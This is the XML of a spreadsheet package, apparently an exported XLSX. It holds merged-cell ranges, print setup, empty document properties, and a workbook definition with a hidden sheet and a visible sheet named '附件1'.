    <mergeCell ref="A19:A20"/>
    <mergeCell ref="A21:A22"/>
    <mergeCell ref="A23:A24"/>
    <mergeCell ref="B3:B4"/>
    <mergeCell ref="B5:B11"/>
    <mergeCell ref="B12:B15"/>
    <mergeCell ref="B16:B18"/>
    <mergeCell ref="B19:B20"/>
    <mergeCell ref="B21:B22"/>
    <mergeCell ref="B23:B24"/>
    <mergeCell ref="C3:C4"/>
    <mergeCell ref="C5:C11"/>
    <mergeCell ref="C12:C15"/>
    <mergeCell ref="C16:C18"/>
    <mergeCell ref="C19:C20"/>
    <mergeCell ref="C21:C22"/>
    <mergeCell ref="C23:C24"/>
    <mergeCell ref="F5:F15"/>
    <mergeCell ref="F16:F25"/>
    <mergeCell ref="G5:G11"/>
    <mergeCell ref="G12:G15"/>
    <mergeCell ref="G16:G18"/>
    <mergeCell ref="G19:G20"/>
    <mergeCell ref="G21:G22"/>
    <mergeCell ref="G23:G24"/>
    <mergeCell ref="H5:H11"/>
    <mergeCell ref="H12:H15"/>
    <mergeCell ref="H16:H18"/>
    <mergeCell ref="H19:H20"/>
    <mergeCell ref="H21:H22"/>
    <mergeCell ref="H23:H24"/>
    <mergeCell ref="I5:I11"/>
    <mergeCell ref="I12:I15"/>
    <mergeCell ref="I16:I18"/>
    <mergeCell ref="I19:I20"/>
    <mergeCell ref="I21:I22"/>
    <mergeCell ref="I23:I24"/>
  </mergeCells>
  <pageMargins left="0.350000" right="0.350000" bottom="0.275000" top="0.432639" header="0.000000" footer="0.432639"/>
  <pageSetup paperSize="9" scale="90" fitToWidth="1" fitToHeight="1" orientation="landscape" horizontalDpi="600" verticalDpi="200"/>
</worksheet>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties">
  <Template/>
  <TotalTime>0</TotalTime>
  <Pages>0</Pages>
  <Words>0</Words>
  <Characters>0</Characters>
  <Application/>
  <DocSecurity>0</DocSecurity>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>0</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HyperlinksChanged>false</HyperlinksChanged>
</Properties>
</file>

<file path=docProps/core.xml><?xml version="1.0" encoding="utf-8"?>
<cp:coreProperties xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties">
  <dc:title/>
  <dc:subject/>
  <dc:creator/>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy/>
  <cp:revision>0</cp:revision>
</cp:coreProperties>
</file>

<file path=tbak/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workbookPr hidePivotFieldList="0" filterPrivacy="0"/>
  <workbookProtection workbookPassword="0000" lockWindows="0" lockStructure="0"/>
  <bookViews>
    <workbookView activeTab="1" firstSheet="1" tabRatio="600" windowHeight="12255" windowWidth="27945" yWindow="0" xWindow="0"/>
  </bookViews>
  <sheets>
    <sheet name="YPIOTWWQSNJPJYOTRPPMYJOLHJMP" sheetId="1" state="hidden" r:id="sId1"/>
    <sheet name="附件1" sheetId="2" state="visible" r:id="sId2"/>
  </sheets>
  <definedNames>
    <definedName name="Counter" localSheetId="0">YPIOTWWQSNJPJYOTRPPMYJOLHJMP!$C$82</definedName>
    <definedName name="Print_Titles" localSheetId="1">附件1!$A$2:$XFD$4</definedName>
  </definedNames>
</workbook>
</file>